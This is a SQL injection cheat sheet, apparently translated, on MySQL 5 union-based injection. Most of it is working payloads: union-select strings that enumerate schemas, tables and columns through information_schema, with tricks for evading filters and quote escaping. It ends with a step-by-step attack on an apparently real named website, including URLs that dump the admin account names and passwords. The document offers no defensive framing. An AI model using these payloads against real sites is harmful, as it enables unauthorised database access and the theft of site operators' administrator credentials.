Enumerating databases

id=-1 union select 1,..,SCHEMA_NAME,n from/**/information_schema.SCHEMATA limit 1,1/*

(1,..,n stands for the column count of the page's own SELECT, found beforehand with order by or by adding columns to the union until the error disappears; SCHEMA_NAME goes in whichever position the page actually prints. id=-1 makes the real query return nothing, so the union row is the only one rendered. limit 1,1 returns the second schema; step the offset to walk through the rest.)

Enumerating tables

id=-1/**/union/**/select/**/1,TABLE_NAME,N/**/from/**/information_schema.TABLES/**/where/**/TABLE_SCHEMA=<hex of the database name>/**/limit/**/1,1

Enumerating columns

id=-1/**/union/**/select/**/1,COLUMN_NAME,N/**/from/**/information_schema.COLUMNS/**/where/**/TABLE_NAME=<hex of the table name>/**/limit/**/1,1

The names are written as 0x... hex literals, which MySQL compares as strings, so the payload contains no quotes and survives magic_quotes-style escaping; /**/ stands in for every space to get past filters that strip or reject spaces. information_schema exists only from MySQL 5.0 on, which is why this is a MySQL 5 technique. TABLE_NAME alone is ambiguous once several schemas hold a table of the same name; adding and TABLE_SCHEMA=<hex of the database name>, as step 2 of the example does, pins it down.

MySQL 5 advanced injection: dumping tables

Example:

1. Dump tables
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,TABLE_NAME,5/**/From/**/information_schema.TABLES/**/Where/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/* (0x79645F7465616D6E6574 is the hex encoding of the database name yd_teamnet)
Walking the limit offset, the fourth table returned was admin_user.

2. Dump columns
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,COLUMN_NAME,5/**/From/**/information_schema.COLUMNS/**/Where/**/TABLE_NAME=0x61646D696E5F75736572/**/And/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/*

3. Dump passwords
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,concat(0x7c,ID,0x7c,ACCOUNT,0x7c,PASSWORD,0x7c),5/**/From/**/admin_user/**/limit/**/0,1/*